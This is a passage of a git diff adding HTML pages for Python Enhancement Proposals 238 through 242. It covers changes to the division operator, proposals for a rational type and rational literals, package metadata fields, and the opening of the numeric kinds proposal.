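1.0 / 2    # classic division: 0.5 (a float is involved)
1 // 2     # floor division: 0
1.0 // 2   # floor division: 0.0
1 / 2      # true division (with the future statement): 0.5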

+

Because of severe backwards compatibility issues, not to mention a major +flamewar on c.l.py, we propose the following transitional measures (starting +with Python 2.2):

+
    +
  • Classic division will remain the default in the Python 2.x series; true +division will be standard in Python 3.0.
  • +
  • The // operator will be available to request floor division +unambiguously.
  • +
  • The future division statement, spelled from __future__ import division, +will change the / operator to mean true division throughout the module.
  • +
  • A command line option will enable run-time warnings for classic division +applied to int or long arguments; another command line option will make true +division the default.
  • +
  • The standard library will use the future division statement and the // +operator when appropriate, so as to completely avoid classic division.
  • +
+
+
+

Motivation

+

The classic division operator makes it hard to write numerical expressions +that are supposed to give correct results from arbitrary numerical inputs. +For all other operators, one can write down a formula such as x*y**2 + z, +and the calculated result will be close to the mathematical result (within the +limits of numerical accuracy, of course) for any numerical input type (int, +long, float, or complex). But division poses a problem: if the expressions +for both arguments happen to have an integral type, it implements floor +division rather than true division.

+

The problem is unique to dynamically typed languages: in a statically typed +language like C, the inputs, typically function arguments, would be declared +as double or float, and when a call passes an integer argument, it is +converted to double or float at the time of the call. Python doesn’t have +argument type declarations, so integer arguments can easily find their way +into an expression.

+

The problem is particularly pernicious since ints are perfect substitutes for +floats in all other circumstances: math.sqrt(2) returns the same value as +math.sqrt(2.0), 3.14*100 and 3.14*100.0 return the same value, and +so on. Thus, the author of a numerical routine may only use floating point +numbers to test his code, and believe that it works correctly, and a user may +accidentally pass in an integer input value and get incorrect results.

+

Another way to look at this is that classic division makes it difficult to +write polymorphic functions that work well with either float or int arguments; +all other operators already do the right thing. No algorithm that works for +both ints and floats has a need for truncating division in one case and true +division in the other.

+

The correct work-around is subtle: casting an argument to float() is wrong if +it could be a complex number; adding 0.0 to an argument doesn’t preserve the +sign of the argument if it was minus zero. The only solution without either +downside is multiplying an argument (typically the first) by 1.0. This leaves +the value and sign unchanged for float and complex, and turns int and long +into a float with the corresponding value.
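A sketch of the work-around and the pitfalls just described:

float(x) / y    # wrong if x may be a complex number
(x + 0.0) / y   # loses the sign of x when x == -0.0
x * 1.0 / y     # safe: preserves value and sign for float and complex,
                # and converts int/long to float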

+

It is the opinion of the authors that this is a real design bug in Python, and +that it should be fixed sooner rather than later. Assuming Python usage will +continue to grow, the cost of leaving this bug in the language will eventually +outweigh the cost of fixing old code – there is an upper bound to the amount +of code to be fixed, but the amount of code that might be affected by the bug +in the future is unbounded.

+

Another reason for this change is the desire to ultimately unify Python’s +numeric model. This is the subject of PEP 228 (which is currently +incomplete). A unified numeric model removes most of the user’s need to be +aware of different numerical types. This is good for beginners, but also +takes away concerns about different numeric behavior for advanced programmers. +(Of course, it won’t remove concerns about numerical stability and accuracy.)

+

In a unified numeric model, the different types (int, long, float, complex, +and possibly others, such as a new rational type) serve mostly as storage +optimizations, and to some extent to indicate orthogonal properties such as +inexactness or complexity. In a unified model, the integer 1 should be +indistinguishable from the floating point number 1.0 (except for its +inexactness), and both should behave the same in all numeric contexts. +Clearly, in a unified numeric model, if a==b and c==d, a/c should +equal b/d (taking some liberties due to rounding for inexact numbers), and +since everybody agrees that 1.0/2.0 equals 0.5, 1/2 should also equal +0.5. Likewise, since 1//2 equals zero, 1.0//2.0 should also equal +zero.

+
+
+

Variations

+

Aesthetically, x//y doesn’t please everyone, and hence several variations +have been proposed. They are addressed here:

+
    +
  • x div y. This would introduce a new keyword. Since div is a +popular identifier, this would break a fair amount of existing code, unless +the new keyword was only recognized under a future division statement. +Since it is expected that the majority of code that needs to be converted is +dividing integers, this would greatly increase the need for the future +division statement. Even with a future statement, the general sentiment +against adding new keywords unless absolutely necessary argues against this.
  • +
  • div(x, y). This makes the conversion of old code much harder. +Replacing x/y with x//y or x div y can be done with a simple +query replace; in most cases the programmer can easily verify that a +particular module only works with integers so all occurrences of x/y can +be replaced. (The query replace is still needed to weed out slashes +occurring in comments or string literals.) Replacing x/y with +div(x, y) would require a much more intelligent tool, since the extent +of the expressions to the left and right of the / must be analyzed +before the placement of the div( and ) part can be decided.
  • +
  • x \ y. The backslash is already a token, meaning line continuation, and +in general it suggests an escape to Unix eyes. In addition (this due to +Terry Reedy) this would make things like eval("x\y") harder to get +right.
  • +
+
+
+

Alternatives

+

In order to reduce the amount of old code that needs to be converted, several +alternative proposals have been put forth. Here is a brief discussion of each +proposal (or category of proposals). If you know of an alternative that was +discussed on c.l.py that isn’t mentioned here, please mail the second author.

+
    +
• Let / keep its classic semantics; introduce // for true division. This still leaves a broken operator in the language, and invites use of the broken behavior. It also shuts off the road to a unified numeric model a la PEP 228.
  • +
• Let int division return a special “portmanteau” type that behaves as an integer in integer context, but like a float in a float context. The problem with this is that after a few operations, the int and the float value could be miles apart; it’s unclear which value should be used in comparisons, and of course many contexts (like conversion to string) don’t have a clear integer or float preference.
  • +
  • Use a directive to use specific division semantics in a module, rather than +a future statement. This retains classic division as a permanent wart in +the language, requiring future generations of Python programmers to be +aware of the problem and the remedies.
  • +
  • Use from __past__ import division to use classic division semantics in a +module. This also retains the classic division as a permanent wart, or at +least for a long time (eventually the past division statement could raise an +ImportError).
  • +
  • Use a directive (or some other way) to specify the Python version for which +a specific piece of code was developed. This requires future Python +interpreters to be able to emulate exactly several previous versions of +Python, and moreover to do so for multiple versions within the same +interpreter. This is way too much work. A much simpler solution is to keep +multiple interpreters installed. Another argument against this is that the +version directive is almost always overspecified: most code written for +Python X.Y, works for Python X.(Y-1) and X.(Y+1) as well, so specifying X.Y +as a version is more constraining than it needs to be. At the same time, +there’s no way to know at which future or past version the code will break.
  • +
+
+
+

API Changes

+

During the transitional phase, we have to support three division operators +within the same program: classic division (for / in modules without a +future division statement), true division (for / in modules with a future +division statement), and floor division (for //). Each operator comes in +two flavors: regular, and as an augmented assignment operator (/= or +//=).

+

The names associated with these variations are:

+
    +
  • Overloaded operator methods:
    __div__(), __floordiv__(), __truediv__();
    +__idiv__(), __ifloordiv__(), __itruediv__().
    +
    +
    +
  • +
  • Abstract API C functions:
    PyNumber_Divide(), PyNumber_FloorDivide(),
    +PyNumber_TrueDivide();
    +
    +PyNumber_InPlaceDivide(), PyNumber_InPlaceFloorDivide(),
    +PyNumber_InPlaceTrueDivide().
    +
    +
    +
  • +
  • Byte code opcodes:
    BINARY_DIVIDE, BINARY_FLOOR_DIVIDE, BINARY_TRUE_DIVIDE;
    +INPLACE_DIVIDE, INPLACE_FLOOR_DIVIDE, INPLACE_TRUE_DIVIDE.
    +
    +
    +
  • +
  • PyNumberMethod slots:
    nb_divide, nb_floor_divide, nb_true_divide,
    +nb_inplace_divide, nb_inplace_floor_divide,
    +nb_inplace_true_divide.
    +
    +
    +
  • +
+

The added PyNumberMethod slots require an additional flag in tp_flags; +this flag will be named Py_TPFLAGS_HAVE_NEWDIVIDE and will be included in +Py_TPFLAGS_DEFAULT.

+

The true and floor division APIs will look for the corresponding slots and +call that; when that slot is NULL, they will raise an exception. There is +no fallback to the classic divide slot.

+

In Python 3.0, the classic division semantics will be removed; the classic +division APIs will become synonymous with true division.

+
+
+

Command Line Option

+

The -Q command line option takes a string argument that can take four +values: old, warn, warnall, or new. The default is old +in Python 2.2 but will change to warn in later 2.x versions. The old +value means the classic division operator acts as described. The warn +value means the classic division operator issues a warning (a +DeprecationWarning using the standard warning framework) when applied +to ints or longs. The warnall value also issues warnings for classic +division when applied to floats or complex; this is for use by the +fixdiv.py conversion script mentioned below. The new value changes +the default globally so that the / operator is always interpreted as +true division. The new option is only intended for use in certain +educational environments, where true division is required, but asking the +students to include the future division statement in all their code would be a +problem.
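For example, using the option values defined above:

python -Qold script.py      # / keeps classic semantics (the 2.2 default)
python -Qwarn script.py     # warn when / is applied to ints or longs
python -Qwarnall script.py  # warn on every classic division (for fixdiv.py)
python -Qnew script.py      # / is true division everywhere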

+

This option will not be supported in Python 3.0; Python 3.0 will always +interpret / as true division.

+

(This option was originally proposed as -D, but that turned out to be an +existing option for Jython, hence the Q – mnemonic for Quotient. Other names +have been proposed, like -Qclassic, -Qclassic-warn, -Qtrue, or +-Qold_division etc.; these seem more verbose to me without much advantage. +After all the term classic division is not used in the language at all (only +in the PEP), and the term true division is rarely used in the language – only +in __truediv__.)

+
+
+

Semantics of Floor Division

+

Floor division will be implemented in all the Python numeric types, and will +have the semantics of:

+
a // b == floor(a/b)
+
+
+

except that the result type will be the common type into which a and b are +coerced before the operation.

+

Specifically, if a and b are of the same type, a//b will be of that +type too. If the inputs are of different types, they are first coerced to a +common type using the same rules used for all other arithmetic operators.

+

In particular, if a and b are both ints or longs, the result has the same +type and value as for classic division on these types (including the case of +mixed input types; int//long and long//int will both return a long).
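Since the result is a floor, it rounds towards negative infinity, not towards zero; a quick sketch:

7 // 2     # 3
-7 // 2    # -4, i.e. floor(-3.5), not -3
7 // -2    # -4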

+

For floating point inputs, the result is a float. For example:

+
3.5//2.0 == 1.0
+
+
+

For complex numbers, // raises an exception, since floor() of a +complex number is not allowed.

+

For user-defined classes and extension types, all semantics are up to the +implementation of the class or type.

+
+
+

Semantics of True Division

+

True division for ints and longs will convert the arguments to float and then +apply a float division. That is, even 2/1 will return a float (2.0), +not an int. For floats and complex, it will be the same as classic division.

+

The 2.2 implementation of true division acts as if the float type had +unbounded range, so that overflow doesn’t occur unless the magnitude of the +mathematical result is too large to represent as a float. For example, +after x = 1L << 40000, float(x) raises OverflowError (note that +this is also new in 2.2: previously the outcome was platform-dependent, most +commonly a float infinity). But x/x returns 1.0 without exception, +while x/1 raises OverflowError.

+

Note that for int and long arguments, true division may lose information; this +is in the nature of true division (as long as rationals are not in the +language). Algorithms that consciously use longs should consider using +//, as true division of longs retains no more than 53 bits of precision +(on most platforms).
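A sketch of the information loss (assuming IEEE doubles, with 53 bits of mantissa):

from __future__ import division

x = 2**60 + 1   # 61 significant bits; a long
x / 1           # true division: 1.152921504606847e+18, the low bit is lost
x // 1          # floor division: 1152921504606846977L, exact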

+

If and when a rational type is added to Python (see PEP 239), true +division for ints and longs should probably return a rational. This avoids +the problem with true division of ints and longs losing information. But +until then, for consistency, float is the only choice for true division.

+
+
+

The Future Division Statement

+

If from __future__ import division is present in a module, or if +-Qnew is used, the / and /= operators are translated to true +division opcodes; otherwise they are translated to classic division (until +Python 3.0 comes along, where they are always translated to true division).
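A sketch of a module opting in:

from __future__ import division

print 1/2    # 0.5: true division throughout this module
print 1//2   # 0: the future statement does not affect //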

+

The future division statement has no effect on the recognition or translation +of // and //=.

+

See PEP 236 for the general rules for future statements.

+

(It has been proposed to use a longer phrase, like true_division or +modern_division. These don’t seem to add much information.)

+
+
+

Open Issues

+

We expect that these issues will be resolved over time, as more feedback is +received or we gather more experience with the initial implementation.

+
    +
• It has been proposed to call // the quotient operator, and the / operator the ratio operator. I’m not sure about this – for some people quotient is just a synonym for division, and ratio suggests rational numbers, which is wrong. I prefer the terminology to be slightly awkward if that avoids ambiguity. Also, for some folks quotient suggests truncation towards zero, not towards negative infinity as floor division says explicitly.
  • +
  • It has been argued that a command line option to change the default is +evil. It can certainly be dangerous in the wrong hands: for example, it +would be impossible to combine a 3rd party library package that requires +-Qnew with another one that requires -Qold. But I believe that the +VPython folks need a way to enable true division by default, and other +educators might need the same. These usually have enough control over the +library packages available in their environment.
  • +
  • For classes to have to support all three of __div__(), +__floordiv__() and __truediv__() seems painful; and what to do in +3.0? Maybe we only need __div__() and __floordiv__(), or maybe at +least true division should try __truediv__() first and __div__() +second.
  • +
+
+
+

Resolved Issues

+
    +
  • Issue: For very large long integers, the definition of true division as +returning a float causes problems, since the range of Python longs is much +larger than that of Python floats. This problem will disappear if and when +rational numbers are supported.

    Resolution: For long true division, Python uses an internal float type with +native double precision but unbounded range, so that OverflowError doesn’t +occur unless the quotient is too large to represent as a native double.

    +
  • +
  • Issue: In the interim, maybe the long-to-float conversion could be made to +raise OverflowError if the long is out of range.

    Resolution: This has been implemented, but, as above, the magnitude of the +inputs to long true division doesn’t matter; only the magnitude of the +quotient matters.

    +
  • +
  • Issue: Tim Peters will make sure that whenever an in-range float is +returned, decent precision is guaranteed.

    Resolution: Provided the quotient of long true division is representable as +a float, it suffers no more than 3 rounding errors: one each for converting +the inputs to an internal float type with native double precision but +unbounded range, and one more for the division. However, note that if the +magnitude of the quotient is too small to represent as a native double, +0.0 is returned without exception (“silent underflow”).

    +
  • +
+
+
+

FAQ

+
+

When will Python 3.0 be released?

+
+
We don’t plan that long ahead, so we can’t say for sure. We want to allow +at least two years for the transition. If Python 3.0 comes out sooner, +we’ll keep the 2.x line alive for backwards compatibility until at least +two years from the release of Python 2.2. In practice, you will be able +to continue to use the Python 2.x line for several years after Python 3.0 +is released, so you can take your time with the transition. Sites are +expected to have both Python 2.x and Python 3.x installed simultaneously.
+
+
+

Why isn’t true division called float division?

+
+
Because I want to keep the door open to possibly introducing rationals +and making 1/2 return a rational rather than a float. See PEP 239.
+
+
+

Why is there a need for __truediv__ and __itruediv__?

+
+
We don’t want to make user-defined classes second-class citizens. +Certainly not with the type/class unification going on.
+
+
+

How do I write code that works under the classic rules as well as under the new rules without using // or a future division statement?

+
+
Use x*1.0/y for true division, divmod(x, y) (PEP 228) for int +division. Especially the latter is best hidden inside a function. You +may also write float(x)/y for true division if you are sure that you +don’t expect complex numbers. If you know your integers are never +negative, you can use int(x/y) – while the documentation of int() +says that int() can round or truncate depending on the C +implementation, we know of no C implementation that doesn’t truncate, and +we’re going to change the spec for int() to promise truncation. Note +that classic division (and floor division) round towards negative +infinity, while int() rounds towards zero, giving different answers +for negative numbers.
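For instance, version-agnostic helpers along those lines (a sketch, not taken from the PEP):

def ratio(x, y):
    """True division that works under classic and new rules."""
    return x * 1.0 / y

def intdiv(x, y):
    """Integer division that works under classic and new rules."""
    q, r = divmod(x, y)
    return q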
+
+
+

How do I specify the division semantics for input(), compile(), execfile(), eval() and exec?

+
+
They inherit the choice from the invoking module. PEP 236 now lists +this as a resolved problem, referring to PEP 264.
+
+
+

What about code compiled by the codeop module?

+
+
This is dealt with properly; see PEP 264.
+
+
+

Will there be conversion tools or aids?

+
+
Certainly. While these are outside the scope of the PEP, I should point +out two simple tools that will be released with Python 2.2a3: +Tools/scripts/finddiv.py finds division operators (slightly smarter +than grep /) and Tools/scripts/fixdiv.py can produce patches based +on run-time analysis.
+
+
+

Why is my question not answered here?

+
+
Because we weren’t aware of it. If it’s been discussed on c.l.py and you +believe the answer is of general interest, please notify the second +author. (We don’t have the time or inclination to answer every question +sent in private email, hence the requirement that it be discussed on +c.l.py first.)
+
+
+
+

Implementation

+

Essentially everything mentioned here is implemented in CVS and will be +released with Python 2.2a3; most of it was already released with Python 2.2a2.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0238.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0239/index.html b/pep-0239/index.html new file mode 100644 index 00000000000..805a4aab11d --- /dev/null +++ b/pep-0239/index.html @@ -0,0 +1,249 @@ + + + + + + + + PEP 239 – Adding a Rational Type to Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 239 – Adding a Rational Type to Python

+
+
Author:
+
Christopher A. Craig <python-pep at ccraig.org>, Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001
+
+
+
+
Table of Contents +
+
+

Warning

+

This PEP has been rejected.

+


+

The needs outlined in the rationale section +have been addressed to some extent by the acceptance of PEP 327 +for decimal arithmetic. Guido also noted, “Rational arithmetic +was the default ‘exact’ arithmetic in ABC and it did not work out as +expected”. See the python-dev discussion on 17 June 2005 [1].

+

Postscript: With the acceptance of PEP 3141, “A Type Hierarchy +for Numbers”, a ‘Rational’ numeric abstract base class was added +with a concrete implementation in the ‘fractions’ module.

+

+
+
+

Abstract

+

Python has no numeric type with the semantics of an unboundedly precise rational number. This proposal explains the semantics of such a type, and suggests builtin functions to support such a type. This PEP suggests no literals for rational numbers; that is left for another PEP.

+
+
+

Rationale

+

While sometimes slower and more memory intensive (in general, unboundedly so), rational arithmetic captures more closely the mathematical ideal of numbers, and tends to have behavior which is less surprising to newbies. Though many Python implementations of rational numbers have been written, none of these exist in the core, or are documented in any way. This has made them much less accessible to people who are less Python-savvy.

+
+
+

RationalType

+

There will be a new numeric type added called RationalType. Its +unary operators will do the obvious thing. Binary operators will +coerce integers and long integers to rationals, and rationals to +floats and complexes.

+

The following attributes will be supported: .numerator and +.denominator. The language definition will promise that:

+
r.denominator * r == r.numerator
+
+
+

that the GCD of the numerator and the denominator is 1 and that +the denominator is positive.

+

The method r.trim(max_denominator) will return the closest +rational s to r such that abs(s.denominator) <= max_denominator.
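These invariants map closely onto the fractions.Fraction type that Python eventually gained via PEP 3141; a sketch in modern Python, where limit_denominator() plays roughly the role proposed here for trim():

from fractions import Fraction

r = Fraction(6, 4)
r.numerator, r.denominator        # (3, 2): GCD is 1, denominator positive
r.denominator * r == r.numerator  # True
Fraction('3.1415926535897932').limit_denominator(1000)  # Fraction(355, 113)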

+
+
+

The rational() Builtin

+

This function will have the signature rational(n, d=1). n and d +must both be integers, long integers or rationals. A guarantee is +made that:

+
rational(n, d) * d == n
+
+
+
+
+

Open Issues

+
    +
  • Maybe the type should be called rat instead of rational. +Somebody proposed that we have “abstract” pure mathematical +types named complex, real, rational, integer, and “concrete” +representation types with names like float, rat, long, int.
  • +
  • Should a rational number with an integer value be allowed as a +sequence index? For example, should s[5/3 - 2/3] be equivalent +to s[1]?
  • +
  • Should shift and mask operators be allowed for rational numbers? +For rational numbers with integer values?
  • +
  • Marcin ‘Qrczak’ Kowalczyk summarized the arguments for and +against unifying ints with rationals nicely on c.l.py

    Arguments for unifying ints with rationals:

    +
      +
    • Since 2 == 2/1 and maybe str(2/1) == '2', it reduces surprises +where objects seem equal but behave differently.
    • +
    • / can be freely used for integer division when I know that +there is no remainder (if I am wrong and there is a remainder, +there will probably be some exception later).
    • +
    +

    Arguments against:

    +
      +
• When I use the result of / as a sequence index, it’s usually an error which should not be hidden by making the program work for some data, since it will break for other data.
    • +
    • (this assumes that after unification int and rational would be +different types:) Types should rarely depend on values. It’s +easier to reason when the type of a variable is known: I know +how I can use it. I can determine that something is an int and +expect that other objects used in this place will be ints too.
    • +
    • (this assumes the same type for them:) Int is a good type in +itself, not to be mixed with rationals. The fact that +something is an integer should be expressible as a statement +about its type. Many operations require ints and don’t accept +rationals. It’s natural to think about them as about different +types.
    • +
    +
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0239.rst

+

Last modified: 2024-04-14 20:08:31 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0240/index.html b/pep-0240/index.html new file mode 100644 index 00000000000..d7bf3f9c283 --- /dev/null +++ b/pep-0240/index.html @@ -0,0 +1,212 @@ + + + + + + + + PEP 240 – Adding a Rational Literal to Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 240 – Adding a Rational Literal to Python

+
+
Author:
+
Christopher A. Craig <python-pep at ccraig.org>, Moshe Zadka <moshez at zadka.site.co.il>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
11-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
16-Mar-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

A different PEP suggests adding a builtin rational type to +Python. This PEP suggests changing the ddd.ddd float literal to a +rational in Python, and modifying non-integer division to return +it.

+
+
+

BDFL Pronouncement

+

This PEP is rejected. The needs outlined in the rationale section +have been addressed to some extent by the acceptance of PEP 327 +for decimal arithmetic. Guido also noted, “Rational arithmetic +was the default ‘exact’ arithmetic in ABC and it did not work out as +expected”. See the python-dev discussion on 17 June 2005 [1].

+
+
+

Rationale

+

Rational numbers are useful for exact and unsurprising arithmetic. +They give the correct results people have been taught in various +math classes. Making the “obvious” non-integer type one with more +predictable semantics will surprise new programmers less than +using floating point numbers. As quite a few posts on c.l.py and +on tutor@python.org have shown, people often get bit by strange +semantics of floating point numbers: for example, round(0.98, 2) +still gives 0.97999999999999998.
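A sketch of the kind of surprise, contrasted with exact rational arithmetic (shown with the modern fractions module, which is how rationals eventually landed in Python):

0.1 + 0.2 == 0.3    # False: binary floats are inexact

from fractions import Fraction
Fraction(1, 10) + Fraction(2, 10) == Fraction(3, 10)    # True: exact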

+
+
+

Proposal

+

Literals conforming to the regular expression '\d*\.\d*' will be rational numbers.

+
+
+

Backwards Compatibility

+

The only backwards compatibility issue is the type of the literals mentioned above. The following migration is suggested:

+
    +
  1. The next Python after approval will allow +from __future__ import rational_literals +to cause all such literals to be treated as rational numbers.
  2. +
  3. Python 3.0 will have a warning, turned on by default, about +such literals in the absence of a __future__ statement. The +warning message will contain information about the __future__ +statement, and indicate that to get floating point literals, +they should be suffixed with “e0”.
  4. +
  5. Python 3.1 will have the warning turned off by default. This +warning will stay in place for 24 months, at which time the +literals will be rationals and the warning will be removed.
  6. +
+
+
+

Common Objections

+

Rationals are slow and memory intensive! +(Relax, I’m not taking floats away, I’m just adding two more characters. +1e0 will still be a float)

+

Rationals must present themselves as a decimal float or they will be +horrible for users expecting decimals (i.e. str(.5) should return '.5' and +not '1/2'). This means that many rationals must be truncated at some +point, which gives us a new loss of precision.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0240.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0241/index.html b/pep-0241/index.html new file mode 100644 index 00000000000..7a81a347a27 --- /dev/null +++ b/pep-0241/index.html @@ -0,0 +1,398 @@ + + + + + + + + PEP 241 – Metadata for Python Software Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 241 – Metadata for Python Software Packages

+
+
Author:
+
A.M. Kuchling <amk at amk.ca>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
12-Mar-2001
+
Post-History:
+
19-Mar-2001
+
Superseded-By:
+
314
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Introduction

+

This PEP describes a mechanism for adding metadata to Python +packages. It includes specifics of the field names, and their +semantics and usage.

+
+
+

Including Metadata in Packages

+

The Distutils ‘sdist’ command will be modified to extract the +metadata fields from the arguments and write them to a file in the +generated zipfile or tarball. This file will be named PKG-INFO +and will be placed in the top directory of the source +distribution (where the README, INSTALL, and other files usually +go).

+

Developers may not provide their own PKG-INFO file. The “sdist” +command will, if it detects an existing PKG-INFO file, terminate +with an appropriate error message. This should prevent confusion +caused by the PKG-INFO and setup.py files being out of sync.

+

The PKG-INFO file format is a single set of RFC 822 headers +parseable by the rfc822.py module. The field names listed in the +following section are used as the header names. There’s no +extension mechanism in this simple format; the Catalog and Distutils +SIGs will aim at getting a more flexible format ready for Python 2.2.
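Assembling the fields defined below, a complete PKG-INFO file might look like this (an illustrative sketch built from the PEP's own example values):

Metadata-Version: 1.0
Name: BeagleVote
Version: 1.0a2
Platform: POSIX, Windows
Summary: A module for collecting votes from beagles.
Author-email: "C. Schultz" <cschultz@example.com>
License: MIT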

+
+
+

Fields

+

This section specifies the names and semantics of each of the +supported metadata fields.

+

Fields marked with “(Multiple use)” may be specified multiple times in a single PKG-INFO file. Other fields may only occur once in a PKG-INFO file. Fields marked with “(optional)” are not required to appear in a valid PKG-INFO file; all other fields must be present.

+
+

Metadata-Version

+

Version of the file format; currently “1.0” is the only +legal value here.

+

Example:

+
Metadata-Version: 1.0
+
+
+
+
+

Name

+

The name of the package.

+

Example:

+
Name: BeagleVote
+
+
+
+
+

Version

+

A string containing the package’s version number. This +field should be parseable by one of the Version classes +(StrictVersion or LooseVersion) in the distutils.version +module.

+

Example:

+
Version: 1.0a2
+
+
+
+
+

Platform (multiple use)

+

A comma-separated list of platform specifications, summarizing +the operating systems supported by the package. The major +supported platforms are listed below, but this list is +necessarily incomplete.

+
POSIX, MacOS, Windows, BeOS, Palm OS.
+
+
+

Binary distributions will use the Supported-Platform field in +their metadata to specify the OS and CPU for which the binary +package was compiled. The semantics of the Supported-Platform +are not specified in this PEP.

+

Example:

+
Platform: POSIX, Windows
+
+
+
+
+

Summary

+

A one-line summary of what the package does.

+

Example:

+
Summary: A module for collecting votes from beagles.
+
+
+
+
+

Description (optional)

+

A longer description of the package that can run to several +paragraphs. (Software that deals with metadata should not +assume any maximum size for this field, though one hopes that +people won’t include their instruction manual as the +long-description.)

+

Example:

+
Description: This module collects votes from beagles
+             in order to determine their electoral wishes.
+             Do NOT try to use this module with basset hounds;
+             it makes them grumpy.
+
+
+
+
+

Keywords (optional)

+

A list of additional keywords to be used to assist searching +for the package in a larger catalog.

+

Example:

+
Keywords: dog puppy voting election
+
+
+
+
+

Home-page (optional)

+

A string containing the URL for the package’s home page.

+

Example:

+
Home-page: http://www.example.com/~cschultz/bvote/
+
+
+
+
+

Author (optional)

+

A string containing at a minimum the author’s name. Contact +information can also be added, separating each line with +newlines.

+

Example:

+
Author: C. Schultz
+        Universal Features Syndicate
+        Los Angeles, CA
+
+
+
+
+

Author-email

+

A string containing the author’s e-mail address. It can contain a name and e-mail address in the legal forms for an RFC 822 ‘From:’ header. It’s not optional because cataloging systems can use the e-mail portion of this field as a unique key representing the author. A catalog might provide authors the ability to store their GPG key, personal home page, and other additional metadata about the author, and optionally the ability to associate several e-mail addresses with the same person. Author-related metadata fields are not covered by this PEP.

+

Example:

+
Author-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

License

+

A string selected from a short list of choices, specifying the +license covering the package. Some licenses result in the +software being freely redistributable, so packagers and +resellers can automatically know that they’re free to +redistribute the software. Other licenses will require +a careful reading by a human to determine how the software can be +repackaged and resold.

+

The choices are:

+
Artistic, BSD, DFSG, GNU GPL, GNU LGPL, "MIT",
+Mozilla PL, "public domain", Python, Qt PL, Zope PL, unknown,
+nocommercial, nosell, nosource, shareware, other
+
+
+

Definitions of some of the licenses are:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
DFSG: The license conforms to the Debian Free Software Guidelines, but does not use one of the other DFSG conforming licenses listed here. More information is available at: http://www.debian.org/social_contract#guidelines
Python: Python 1.6 or higher license. Version 1.5.2 and earlier are under the MIT license.
public domain: Software is public domain, not copyrighted.
unknown: Status is not known.
nocommercial: Free private use but commercial use not permitted.
nosell: Free use but distribution for profit by arrangement.
nosource: Freely distributable but no source code.
shareware: Payment is requested if software is used.
other: General category for other non-DFSG licenses.
+

Some of these licenses can be interpreted to mean the software is +freely redistributable. The list of redistributable licenses is:

+
Artistic, BSD, DFSG, GNU GPL, GNU LGPL, "MIT",
+Mozilla PL, "public domain", Python, Qt PL, Zope PL,
+nosource, shareware
+
+
+

Note that being redistributable does not mean a package +qualifies as free software, ‘nosource’ and ‘shareware’ being +examples.

+

Example:

+
License: MIT
+
+
+
+
+
+

Acknowledgements

+

Many changes and rewrites to this document were suggested by the +readers of the Distutils SIG. In particular, Sean Reifschneider +often contributed actual text for inclusion in this PEP.

+

The list of licenses was compiled using the SourceForge license +list and the CTAN license list compiled by Graham Williams; Carey +Evans also offered several useful suggestions on this list.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0241.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0242/index.html b/pep-0242/index.html new file mode 100644 index 00000000000..a8fb13fb594 --- /dev/null +++ b/pep-0242/index.html @@ -0,0 +1,328 @@ + + + + + + + + PEP 242 – Numeric Kinds | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 242 – Numeric Kinds

+
+
Author:
+
Paul F. Dubois <paul at pfdubois.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
17-Mar-2001
+
Python-Version:
+
2.2
+
Post-History:
+
17-Apr-2001
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+


+

The kinds module will not be added to the standard library.

+

There was no opposition to the proposal but only mild interest in +using it, not enough to justify adding the module to the standard +library. Instead, it will be made available as a separate +distribution item at the Numerical Python site. At the next +release of Numerical Python, it will no longer be a part of the +Numeric distribution.

+

+
+
+

Abstract

+

This proposal gives the user optional control over the precision +and range of numeric computations so that a computation can be +written once and run anywhere with at least the desired precision +and range. It is backward compatible with existing code. The +meaning of decimal literals is clarified.

+
+
+

Rationale

+

In every language except Fortran 90, it is currently impossible to write a program in a portable way that uses floating point and gets roughly the same answer regardless of platform – or refuses to compile if that is not possible. Python currently has only one floating point type, equal to a C double in the C implementation.

+

